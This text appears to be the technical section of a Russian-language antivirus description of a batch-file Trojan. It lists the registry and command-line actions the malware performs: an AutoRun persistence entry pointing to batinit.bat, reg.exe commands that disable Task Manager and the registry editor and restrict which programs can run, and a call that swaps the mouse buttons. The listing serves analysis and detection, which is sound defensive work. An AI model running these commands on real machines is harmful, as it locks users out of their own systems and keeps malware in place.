Техническая информация
- [<HKCU>\Software\Microsoft\Command Processor] 'AutoRun' = '<SYSTEM32>\batinit.bat'
- Диспетчера задач (Taskmgr)
- Редактора реестра (RegEdit)
- <SYSTEM32>\reg.exe add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun /v 1 /t REG_DWORD /d %WINDIR%\explorer.exe /f
- <SYSTEM32>\reg.exe add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f
- <SYSTEM32>\reg.exe add "HKCU\SOFTWARE\Microsoft\Command Processor" /v AutoRun /t REG_SZ /d "<SYSTEM32>\batinit.bat" /f
- <SYSTEM32>\cmd.exe /c <SYSTEM32>\bat.bat
- <SYSTEM32>\reg.exe add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
- <SYSTEM32>\rundll32.exe user32, SwapMouseButton
- <SYSTEM32>\batinit.bat
- <SYSTEM32>\bat.bat
- <SYSTEM32>\devmgmt.msc